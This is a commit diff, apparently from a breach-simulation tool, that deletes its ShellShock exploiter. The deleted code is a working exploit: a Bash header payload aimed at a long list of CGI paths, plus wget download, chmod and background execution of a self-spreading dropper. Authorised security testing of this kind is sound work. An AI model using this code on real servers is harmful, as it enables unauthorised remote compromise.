Agent: Remove ShellShock exploiter

monkey/infection_monkey/example.conf

@@ -27,7 +27,6 @@
     "SSHExploiter",
     "SmbExploiter",
     "WmiExploiter",
-    "ShellShockExploiter",
     "ElasticGroovyExploiter",
     "Struts2Exploiter",
     "WebLogicExploiter",

monkey/infection_monkey/exploit/shellshock.py

@@ -1,269 +0,0 @@
-# Implementation is based on shellshock script provided
-# https://github.com/nccgroup/shocker/blob/master/shocker.py
-
-import logging
-import string
-from random import SystemRandom
-
-import requests
-
-from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.shellshock_resources import CGI_FILES
-from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
-from infection_monkey.exploit.tools.http_tools import HTTPTools
-from infection_monkey.model import DROPPER_ARG
-from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
-from infection_monkey.utils.commands import build_monkey_commandline
-
-logger = logging.getLogger(__name__)
-TIMEOUT = 2
-TEST_COMMAND = "/bin/uname -a"
-DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
-LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
-
-
-class ShellShockExploiter(HostExploiter):
-    _attacks = {"Content-type": "() { :;}; echo; "}
-
-    _TARGET_OS_TYPE = ["linux"]
-    _EXPLOITED_SERVICE = "Bash"
-
-    def __init__(self, host):
-        super(ShellShockExploiter, self).__init__(host)
-        self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
-        safe_random = SystemRandom()
-        self.success_flag = "".join(
-            safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
-        )
-
-    def _exploit_host(self):
-        # start by picking ports
-        candidate_services = {
-            service: self.host.services[service]
-            for service in self.host.services
-            if ("name" in self.host.services[service])
-            and (self.host.services[service]["name"] == "http")
-        }
-
-        valid_ports = [
-            (port, candidate_services["tcp-" + str(port)]["data"][1])
-            for port in self.HTTP
-            if "tcp-" + str(port) in candidate_services
-        ]
-        http_ports = [port[0] for port in valid_ports if not port[1]]
-        https_ports = [port[0] for port in valid_ports if port[1]]
-
-        logger.info(
-            "Scanning %s, ports [%s] for vulnerable CGI pages"
-            % (self.host, ",".join([str(port[0]) for port in valid_ports]))
-        )
-
-        attackable_urls = []
-        # now for each port we want to check the entire URL list
-        for port in http_ports:
-            urls = self.check_urls(self.host.ip_addr, port)
-            attackable_urls.extend(urls)
-        for port in https_ports:
-            urls = self.check_urls(self.host.ip_addr, port, is_https=True)
-            attackable_urls.extend(urls)
-        # now for each URl we want to try and see if it's attackable
-        exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
-        exploitable_urls = [url for url in exploitable_urls if url[0] is True]
-
-        # we want to report all vulnerable URLs even if we didn't succeed
-        self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
-
-        # now try URLs until we install something on victim
-        for _, url, header, exploit in exploitable_urls:
-            logger.info("Trying to attack host %s with %s URL" % (self.host, url))
-            # same attack script as sshexec
-            # for any failure, quit and don't try other URLs
-            if not self.host.os.get("type"):
-                try:
-                    uname_os_attack = exploit + "/bin/uname -o"
-                    uname_os = self.attack_page(url, header, uname_os_attack)
-                    if "linux" in uname_os:
-                        self.host.os["type"] = "linux"
-                    else:
-                        logger.info("SSH Skipping unknown os: %s", uname_os)
-                        return False
-                except Exception as exc:
-                    logger.debug(
-                        "Error running uname os command on victim %r: (%s)", self.host, exc
-                    )
-                    return False
-            if not self.host.os.get("machine"):
-                try:
-                    uname_machine_attack = exploit + "/bin/uname -m"
-                    uname_machine = self.attack_page(url, header, uname_machine_attack)
-                    if "" != uname_machine:
-                        self.host.os["machine"] = uname_machine.lower().strip()
-                except Exception as exc:
-                    logger.debug(
-                        "Error running uname machine command on victim %r: (%s)", self.host, exc
-                    )
-                    return False
-
-            # copy the monkey
-            dropper_target_path_linux = self._config.dropper_target_path_linux
-
-            src_path = get_target_monkey(self.host)
-            if not src_path:
-                logger.info("Can't find suitable monkey executable for host %r", self.host)
-                return False
-
-            if not self._create_lock_file(exploit, url, header):
-                logger.info("Another monkey is running shellshock exploit")
-                return True
-
-            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
-
-            if not http_path:
-                logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
-                return False
-
-            download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
-
-            download = exploit + download_command
-            self.attack_page(
-                url, header, download
-            )  # we ignore failures here since it might take more than TIMEOUT time
-
-            http_thread.join(DOWNLOAD_TIMEOUT)
-            http_thread.stop()
-
-            self._remove_lock_file(exploit, url, header)
-
-            if (http_thread.downloads != 1) or (
-                "ELF"
-                not in self.check_remote_file_exists(
-                    url, header, exploit, dropper_target_path_linux
-                )
-            ):
-                logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
-                continue
-
-            # turn the monkey into an executable
-            chmod = "/bin/chmod +x %s" % dropper_target_path_linux
-            run_path = exploit + chmod
-            self.attack_page(url, header, run_path)
-            T1222Telem(ScanStatus.USED, chmod, self.host).send()
-
-            # run the monkey
-            cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-            cmdline += build_monkey_commandline(
-                self.host,
-                get_monkey_depth() - 1,
-                dropper_target_path_linux,
-            )
-            cmdline += " & "
-            run_path = exploit + cmdline
-            self.attack_page(url, header, run_path)
-
-            logger.info(
-                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                self._config.dropper_target_path_linux,
-                self.host,
-                cmdline,
-            )
-
-            if not (
-                self.check_remote_file_exists(
-                    url, header, exploit, self._config.monkey_log_path_linux
-                )
-            ):
-                logger.info("Log file does not exist, monkey might not have run")
-                continue
-            self.add_executed_cmd(cmdline)
-            return True
-
-        return False
-
-    @classmethod
-    def check_remote_file_exists(cls, url, header, exploit, file_path):
-        """
-        Checks if a remote file exists and returns the content if so
-        file_path should be fully qualified
-        """
-        cmdline = "/usr/bin/head -c 4 %s" % file_path
-        run_path = exploit + cmdline
-        resp = cls.attack_page(url, header, run_path)
-        if resp:
-            logger.info("File %s exists on remote host" % file_path)
-        return resp
-
-    def attempt_exploit(self, url, attacks=None):
-        # Flag used to identify whether the exploit has successfully caused the
-        # server to return a useful response
-
-        if not attacks:
-            attacks = self._attacks
-
-        logger.debug("Attack Flag is: %s" % self.success_flag)
-
-        logger.debug("Trying exploit for %s" % url)
-        for header, exploit in list(attacks.items()):
-            attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
-            result = self.attack_page(url, header, attack)
-            if self.success_flag in result:
-                logger.info("URL %s looks vulnerable" % url)
-                return True, url, header, exploit
-            else:
-                logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
-        return (False,)
-
-    def _create_lock_file(self, exploit, url, header):
-        if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
-            return False
-        cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
-        self.attack_page(url, header, cmd)
-        return True
-
-    def _remove_lock_file(self, exploit, url, header):
-        cmd = exploit + "rm %s" % LOCK_HELPER_FILE
-        self.attack_page(url, header, cmd)
-
-    @staticmethod
-    def attack_page(url, header, attack):
-        result = ""
-        try:
-            logger.debug("Header is: %s" % header)
-            logger.debug("Attack is: %s" % attack)
-            r = requests.get(  # noqa: DUO123
-                url, headers={header: attack}, verify=False, timeout=TIMEOUT
-            )
-            result = r.content.decode()
-            return result
-        except requests.exceptions.RequestException as exc:
-            logger.debug("Failed to run, exception %s" % exc)
-            return result
-
-    @staticmethod
-    def check_urls(host, port, is_https=False, url_list=CGI_FILES):
-        """
-        Checks if which urls exist
-        :return: Sequence of URLs to try and attack
-        """
-        attack_path = "http://"
-        if is_https:
-            attack_path = "https://"
-        attack_path = attack_path + str(host) + ":" + str(port)
-        reqs = []
-        timeout = False
-        attack_urls = [attack_path + url for url in url_list]
-        for u in attack_urls:
-            try:
-                reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))  # noqa: DUO123
-            except requests.Timeout:
-                timeout = True
-                break
-        if timeout:
-            logger.debug(
-                "Some connections timed out while sending request to potentially vulnerable "
-                "urls."
-            )
-        valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
-        urls = [resp.url for resp in valid_resps]
-
-        return urls

monkey/infection_monkey/exploit/shellshock_resources.py

@@ -1,408 +0,0 @@
-# resource for shellshock attack
-# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
-
-CGI_FILES = (
-    r"/",
-    r"/admin.cgi",
-    r"/administrator.cgi",
-    r"/agora.cgi",
-    r"/aktivate/cgi-bin/catgy.cgi",
-    r"/analyse.cgi",
-    r"/apps/web/vs_diag.cgi",
-    r"/axis-cgi/buffer/command.cgi",
-    r"/b2-include/b2edit.showposts.php",
-    r"/bandwidth/index.cgi",
-    r"/bigconf.cgi",
-    r"/cartcart.cgi",
-    r"/cart.cgi",
-    r"/ccbill/whereami.cgi",
-    r"/cgi-bin/14all-1.1.cgi",
-    r"/cgi-bin/14all.cgi",
-    r"/cgi-bin/a1disp3.cgi",
-    r"/cgi-bin/a1stats/a1disp3.cgi",
-    r"/cgi-bin/a1stats/a1disp4.cgi",
-    r"/cgi-bin/addbanner.cgi",
-    r"/cgi-bin/add_ftp.cgi",
-    r"/cgi-bin/adduser.cgi",
-    r"/cgi-bin/admin/admin.cgi",
-    r"/cgi-bin/admin.cgi",
-    r"/cgi-bin/admin/getparam.cgi",
-    r"/cgi-bin/adminhot.cgi",
-    r"/cgi-bin/admin.pl",
-    r"/cgi-bin/admin/setup.cgi",
-    r"/cgi-bin/adminwww.cgi",
-    r"/cgi-bin/af.cgi",
-    r"/cgi-bin/aglimpse.cgi",
-    r"/cgi-bin/alienform.cgi",
-    r"/cgi-bin/AnyBoard.cgi",
-    r"/cgi-bin/architext_query.cgi",
-    r"/cgi-bin/astrocam.cgi",
-    r"/cgi-bin/AT-admin.cgi",
-    r"/cgi-bin/AT-generate.cgi",
-    r"/cgi-bin/auction/auction.cgi",
-    r"/cgi-bin/auktion.cgi",
-    r"/cgi-bin/ax-admin.cgi",
-    r"/cgi-bin/ax.cgi",
-    r"/cgi-bin/axs.cgi",
-    r"/cgi-bin/badmin.cgi",
-    r"/cgi-bin/banner.cgi",
-    r"/cgi-bin/bannereditor.cgi",
-    r"/cgi-bin/bb-ack.sh",
-    r"/cgi-bin/bb-histlog.sh",
-    r"/cgi-bin/bb-hist.sh",
-    r"/cgi-bin/bb-hostsvc.sh",
-    r"/cgi-bin/bb-replog.sh",
-    r"/cgi-bin/bb-rep.sh",
-    r"/cgi-bin/bbs_forum.cgi",
-    r"/cgi-bin/bigconf.cgi",
-    r"/cgi-bin/bizdb1-search.cgi",
-    r"/cgi-bin/blog/mt-check.cgi",
-    r"/cgi-bin/blog/mt-load.cgi",
-    r"/cgi-bin/bnbform.cgi",
-    r"/cgi-bin/book.cgi",
-    r"/cgi-bin/boozt/admin/index.cgi",
-    r"/cgi-bin/bsguest.cgi",
-    r"/cgi-bin/bslist.cgi",
-    r"/cgi-bin/build.cgi",
-    r"/cgi-bin/bulk/bulk.cgi",
-    r"/cgi-bin/cached_feed.cgi",
-    r"/cgi-bin/cachemgr.cgi",
-    r"/cgi-bin/calendar/index.cgi",
-    r"/cgi-bin/cartmanager.cgi",
-    r"/cgi-bin/cbmc/forums.cgi",
-    r"/cgi-bin/ccvsblame.cgi",
-    r"/cgi-bin/c_download.cgi",
-    r"/cgi-bin/cgforum.cgi",
-    r"/cgi-bin/.cgi",
-    r"/cgi-bin/cgi_process",
-    r"/cgi-bin/classified.cgi",
-    r"/cgi-bin/classifieds.cgi",
-    r"/cgi-bin/classifieds/classifieds.cgi",
-    r"/cgi-bin/classifieds/index.cgi",
-    r"/cgi-bin/.cobalt/alert/service.cgi",
-    r"/cgi-bin/.cobalt/message/message.cgi",
-    r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
-    r"/cgi-bin/commandit.cgi",
-    r"/cgi-bin/commerce.cgi",
-    r"/cgi-bin/common/listrec.pl",
-    r"/cgi-bin/compatible.cgi",
-    r"/cgi-bin/Count.cgi",
-    r"/cgi-bin/csChatRBox.cgi",
-    r"/cgi-bin/csGuestBook.cgi",
-    r"/cgi-bin/csLiveSupport.cgi",
-    r"/cgi-bin/CSMailto.cgi",
-    r"/cgi-bin/CSMailto/CSMailto.cgi",
-    r"/cgi-bin/csNews.cgi",
-    r"/cgi-bin/csNewsPro.cgi",
-    r"/cgi-bin/csPassword.cgi",
-    r"/cgi-bin/csPassword/csPassword.cgi",
-    r"/cgi-bin/csSearch.cgi",
-    r"/cgi-bin/csv_db.cgi",
-    r"/cgi-bin/cvsblame.cgi",
-    r"/cgi-bin/cvslog.cgi",
-    r"/cgi-bin/cvsquery.cgi",
-    r"/cgi-bin/cvsqueryform.cgi",
-    r"/cgi-bin/day5datacopier.cgi",
-    r"/cgi-bin/day5datanotifier.cgi",
-    r"/cgi-bin/db_manager.cgi",
-    r"/cgi-bin/dbman/db.cgi",
-    r"/cgi-bin/dcforum.cgi",
-    r"/cgi-bin/dcshop.cgi",
-    r"/cgi-bin/dfire.cgi",
-    r"/cgi-bin/diagnose.cgi",
-    r"/cgi-bin/dig.cgi",
-    r"/cgi-bin/directorypro.cgi",
-    r"/cgi-bin/download.cgi",
-    r"/cgi-bin/e87_Ba79yo87.cgi",
-    r"/cgi-bin/emu/html/emumail.cgi",
-    r"/cgi-bin/emumail.cgi",
-    r"/cgi-bin/emumail/emumail.cgi",
-    r"/cgi-bin/enter.cgi",
-    r"/cgi-bin/environ.cgi",
-    r"/cgi-bin/ezadmin.cgi",
-    r"/cgi-bin/ezboard.cgi",
-    r"/cgi-bin/ezman.cgi",
-    r"/cgi-bin/ezshopper2/loadpage.cgi",
-    r"/cgi-bin/ezshopper3/loadpage.cgi",
-    r"/cgi-bin/ezshopper/loadpage.cgi",
-    r"/cgi-bin/ezshopper/search.cgi",
-    r"/cgi-bin/faqmanager.cgi",
-    r"/cgi-bin/FileSeek2.cgi",
-    r"/cgi-bin/FileSeek.cgi",
-    r"/cgi-bin/finger.cgi",
-    r"/cgi-bin/flexform.cgi",
-    r"/cgi-bin/fom.cgi",
-    r"/cgi-bin/fom/fom.cgi",
-    r"/cgi-bin/FormHandler.cgi",
-    r"/cgi-bin/FormMail.cgi",
-    r"/cgi-bin/gbadmin.cgi",
-    r"/cgi-bin/gbook/gbook.cgi",
-    r"/cgi-bin/generate.cgi",
-    r"/cgi-bin/getdoc.cgi",
-    r"/cgi-bin/gH.cgi",
-    r"/cgi-bin/gm-authors.cgi",
-    r"/cgi-bin/gm.cgi",
-    r"/cgi-bin/gm-cplog.cgi",
-    r"/cgi-bin/guestbook.cgi",
-    r"/cgi-bin/handler",
-    r"/cgi-bin/handler.cgi",
-    r"/cgi-bin/handler/netsonar",
-    r"/cgi-bin/hitview.cgi",
-    r"/cgi-bin/hsx.cgi",
-    r"/cgi-bin/html2chtml.cgi",
-    r"/cgi-bin/html2wml.cgi",
-    r"/cgi-bin/htsearch.cgi",
-    r"/cgi-bin/hw.sh",  # testing
-    r"/cgi-bin/icat",
-    r"/cgi-bin/if/admin/nph-build.cgi",
-    r"/cgi-bin/ikonboard/help.cgi",
-    r"/cgi-bin/ImageFolio/admin/admin.cgi",
-    r"/cgi-bin/imageFolio.cgi",
-    r"/cgi-bin/index.cgi",
-    r"/cgi-bin/infosrch.cgi",
-    r"/cgi-bin/jammail.pl",
-    r"/cgi-bin/journal.cgi",
-    r"/cgi-bin/lastlines.cgi",
-    r"/cgi-bin/loadpage.cgi",
-    r"/cgi-bin/login.cgi",
-    r"/cgi-bin/logit.cgi",
-    r"/cgi-bin/log-reader.cgi",
-    r"/cgi-bin/lookwho.cgi",
-    r"/cgi-bin/lwgate.cgi",
-    r"/cgi-bin/MachineInfo",
-    r"/cgi-bin/MachineInfo",
-    r"/cgi-bin/magiccard.cgi",
-    r"/cgi-bin/mail/emumail.cgi",
-    r"/cgi-bin/maillist.cgi",
-    r"/cgi-bin/mailnews.cgi",
-    r"/cgi-bin/mail/nph-mr.cgi",
-    r"/cgi-bin/main.cgi",
-    r"/cgi-bin/main_menu.pl",
-    r"/cgi-bin/man.sh",
-    r"/cgi-bin/mini_logger.cgi",
-    r"/cgi-bin/mmstdod.cgi",
-    r"/cgi-bin/moin.cgi",
-    r"/cgi-bin/mojo/mojo.cgi",
-    r"/cgi-bin/mrtg.cgi",
-    r"/cgi-bin/mt.cgi",
-    r"/cgi-bin/mt/mt.cgi",
-    r"/cgi-bin/mt/mt-check.cgi",
-    r"/cgi-bin/mt/mt-load.cgi",
-    r"/cgi-bin/mt-static/mt-check.cgi",
-    r"/cgi-bin/mt-static/mt-load.cgi",
-    r"/cgi-bin/musicqueue.cgi",
-    r"/cgi-bin/myguestbook.cgi",
-    r"/cgi-bin/.namazu.cgi",
-    r"/cgi-bin/nbmember.cgi",
-    r"/cgi-bin/netauth.cgi",
-    r"/cgi-bin/netpad.cgi",
-    r"/cgi-bin/newsdesk.cgi",
-    r"/cgi-bin/nlog-smb.cgi",
-    r"/cgi-bin/nph-emumail.cgi",
-    r"/cgi-bin/nph-exploitscanget.cgi",
-    r"/cgi-bin/nph-publish.cgi",
-    r"/cgi-bin/nph-test.cgi",
-    r"/cgi-bin/pagelog.cgi",
-    r"/cgi-bin/pbcgi.cgi",
-    r"/cgi-bin/perlshop.cgi",
-    r"/cgi-bin/pfdispaly.cgi",
-    r"/cgi-bin/pfdisplay.cgi",
-    r"/cgi-bin/phf.cgi",
-    r"/cgi-bin/photo/manage.cgi",
-    r"/cgi-bin/photo/protected/manage.cgi",
-    r"/cgi-bin/php-cgi",
-    r"/cgi-bin/php.cgi",
-    r"/cgi-bin/php.fcgi",
-    r"/cgi-bin/ping.sh",
-    r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
-    r"/cgi-bin/pollssi.cgi",
-    r"/cgi-bin/postcards.cgi",
-    r"/cgi-bin/powerup/r.cgi",
-    r"/cgi-bin/printenv",
-    r"/cgi-bin/probecontrol.cgi",
-    r"/cgi-bin/profile.cgi",
-    r"/cgi-bin/publisher/search.cgi",
-    r"/cgi-bin/quickstore.cgi",
-    r"/cgi-bin/quizme.cgi",
-    r"/cgi-bin/ratlog.cgi",
-    r"/cgi-bin/r.cgi",
-    r"/cgi-bin/register.cgi",
-    r"/cgi-bin/replicator/webpage.cgi/",
-    r"/cgi-bin/responder.cgi",
-    r"/cgi-bin/robadmin.cgi",
-    r"/cgi-bin/robpoll.cgi",
-    r"/cgi-bin/rtpd.cgi",
-    r"/cgi-bin/sbcgi/sitebuilder.cgi",
-    r"/cgi-bin/scoadminreg.cgi",
-    r"/cgi-bin-sdb/printenv",
-    r"/cgi-bin/sdbsearch.cgi",
-    r"/cgi-bin/search",
-    r"/cgi-bin/search.cgi",
-    r"/cgi-bin/search/search.cgi",
-    r"/cgi-bin/sendform.cgi",
-    r"/cgi-bin/shop.cgi",
-    r"/cgi-bin/shopper.cgi",
-    r"/cgi-bin/shopplus.cgi",
-    r"/cgi-bin/showcheckins.cgi",
-    r"/cgi-bin/simplestguest.cgi",
-    r"/cgi-bin/simplestmail.cgi",
-    r"/cgi-bin/smartsearch.cgi",
-    r"/cgi-bin/smartsearch/smartsearch.cgi",
-    r"/cgi-bin/snorkerz.bat",
-    r"/cgi-bin/snorkerz.bat",
-    r"/cgi-bin/snorkerz.cmd",
-    r"/cgi-bin/snorkerz.cmd",
-    r"/cgi-bin/sojourn.cgi",
-    r"/cgi-bin/spin_client.cgi",
-    r"/cgi-bin/start.cgi",
-    r"/cgi-bin/status",
-    r"/cgi-bin/status_cgi",
-    r"/cgi-bin/store/agora.cgi",
-    r"/cgi-bin/store.cgi",
-    r"/cgi-bin/store/index.cgi",
-    r"/cgi-bin/survey.cgi",
-    r"/cgi-bin/sync.cgi",
-    r"/cgi-bin/talkback.cgi",
-    r"/cgi-bin/technote/main.cgi",
-    r"/cgi-bin/test2.pl",
-    r"/cgi-bin/test-cgi",
-    r"/cgi-bin/test.cgi",
-    r"/cgi-bin/testing_whatever",
-    r"/cgi-bin/test/test.cgi",
-    r"/cgi-bin/tidfinder.cgi",
-    r"/cgi-bin/tigvote.cgi",
-    r"/cgi-bin/title.cgi",
-    r"/cgi-bin/top.cgi",
-    r"/cgi-bin/traffic.cgi",
-    r"/cgi-bin/troops.cgi",
-    r"/cgi-bin/ttawebtop.cgi/",
-    r"/cgi-bin/ultraboard.cgi",
-    r"/cgi-bin/upload.cgi",
-    r"/cgi-bin/urlcount.cgi",
-    r"/cgi-bin/viewcvs.cgi",
-    r"/cgi-bin/view_help.cgi",
-    r"/cgi-bin/viralator.cgi",
-    r"/cgi-bin/virgil.cgi",
-    r"/cgi-bin/vote.cgi",
-    r"/cgi-bin/vpasswd.cgi",
-    r"/cgi-bin/way-board.cgi",
-    r"/cgi-bin/way-board/way-board.cgi",
-    r"/cgi-bin/webbbs.cgi",
-    r"/cgi-bin/webcart/webcart.cgi",
-    r"/cgi-bin/webdist.cgi",
-    r"/cgi-bin/webif.cgi",
-    r"/cgi-bin/webmail/html/emumail.cgi",
-    r"/cgi-bin/webmap.cgi",
-    r"/cgi-bin/webspirs.cgi",
-    r"/cgi-bin/Web_Store/web_store.cgi",
-    r"/cgi-bin/whois.cgi",
-    r"/cgi-bin/whois_raw.cgi",
-    r"/cgi-bin/whois/whois.cgi",
-    r"/cgi-bin/wrap",
-    r"/cgi-bin/wrap.cgi",
-    r"/cgi-bin/wwwboard.cgi.cgi",
-    r"/cgi-bin/YaBB/YaBB.cgi",
-    r"/cgi-bin/zml.cgi",
-    r"/cgi-mod/index.cgi",
-    r"/cgis/wwwboard/wwwboard.cgi",
-    r"/cgi-sys/addalink.cgi",
-    r"/cgi-sys/defaultwebpage.cgi",
-    r"/cgi-sys/domainredirect.cgi",
-    r"/cgi-sys/entropybanner.cgi",
-    r"/cgi-sys/entropysearch.cgi",
-    r"/cgi-sys/FormMail-clone.cgi",
-    r"/cgi-sys/helpdesk.cgi",
-    r"/cgi-sys/mchat.cgi",
-    r"/cgi-sys/randhtml.cgi",
-    r"/cgi-sys/realhelpdesk.cgi",
-    r"/cgi-sys/realsignup.cgi",
-    r"/cgi-sys/signup.cgi",
-    r"/connector.cgi",
-    r"/cp/rac/nsManager.cgi",
-    r"/create_release.sh",
-    r"/CSNews.cgi",
-    r"/csPassword.cgi",
-    r"/dcadmin.cgi",
-    r"/dcboard.cgi",
-    r"/dcforum.cgi",
-    r"/dcforum/dcforum.cgi",
-    r"/debuff.cgi",
-    r"/debug.cgi",
-    r"/details.cgi",
-    r"/edittag/edittag.cgi",
-    r"/emumail.cgi",
-    r"/enter_buff.cgi",
-    r"/enter_bug.cgi",
-    r"/ez2000/ezadmin.cgi",
-    r"/ez2000/ezboard.cgi",
-    r"/ez2000/ezman.cgi",
-    r"/fcgi-bin/echo",
-    r"/fcgi-bin/echo",
-    r"/fcgi-bin/echo2",
-    r"/fcgi-bin/echo2",
-    r"/Gozila.cgi",
-    r"/hitmatic/analyse.cgi",
-    r"/hp_docs/cgi-bin/index.cgi",
-    r"/html/cgi-bin/cgicso",
-    r"/html/cgi-bin/cgicso",
-    r"/index.cgi",
-    r"/info.cgi",
-    r"/infosrch.cgi",
-    r"/login.cgi",
-    r"/mailview.cgi",
-    r"/main.cgi",
-    r"/megabook/admin.cgi",
-    r"/ministats/admin.cgi",
-    r"/mods/apage/apage.cgi",
-    r"/_mt/mt.cgi",
-    r"/musicqueue.cgi",
-    r"/ncbook.cgi",
-    r"/newpro.cgi",
-    r"/newsletter.sh",
-    r"/oem_webstage/cgi-bin/oemapp_cgi",
-    r"/page.cgi",
-    r"/parse_xml.cgi",
-    r"/photodata/manage.cgi",
-    r"/photo/manage.cgi",
-    r"/print.cgi",
-    r"/process_buff.cgi",
-    r"/process_bug.cgi",
-    r"/pub/english.cgi",
-    r"/quikmail/nph-emumail.cgi",
-    r"/quikstore.cgi",
-    r"/reviews/newpro.cgi",
-    r"/ROADS/cgi-bin/search.pl",
-    r"/sample01.cgi",
-    r"/sample02.cgi",
-    r"/sample03.cgi",
-    r"/sample04.cgi",
-    r"/sampleposteddata.cgi",
-    r"/scancfg.cgi",
-    r"/scancfg.cgi",
-    r"/servers/link.cgi",
-    r"/setpasswd.cgi",
-    r"/SetSecurity.shm",
-    r"/shop/member_html.cgi",
-    r"/shop/normal_html.cgi",
-    r"/site_searcher.cgi",
-    r"/siteUserMod.cgi",
-    r"/submit.cgi",
-    r"/technote/print.cgi",
-    r"/template.cgi",
-    r"/test.cgi",
-    r"/ucsm/isSamInstalled.cgi",
-    r"/upload.cgi",
-    r"/userreg.cgi",
-    r"/users/scripts/submit.cgi",
-    r"/vood/cgi-bin/vood_view.cgi",
-    r"/Web_Store/web_store.cgi",
-    r"/webtools/bonsai/ccvsblame.cgi",
-    r"/webtools/bonsai/cvsblame.cgi",
-    r"/webtools/bonsai/cvslog.cgi",
-    r"/webtools/bonsai/cvsquery.cgi",
-    r"/webtools/bonsai/cvsqueryform.cgi",
-    r"/webtools/bonsai/showcheckins.cgi",
-    r"/wwwadmin.cgi",
-    r"/wwwboard.cgi",
-    r"/wwwboard/wwwboard.cgi",
-)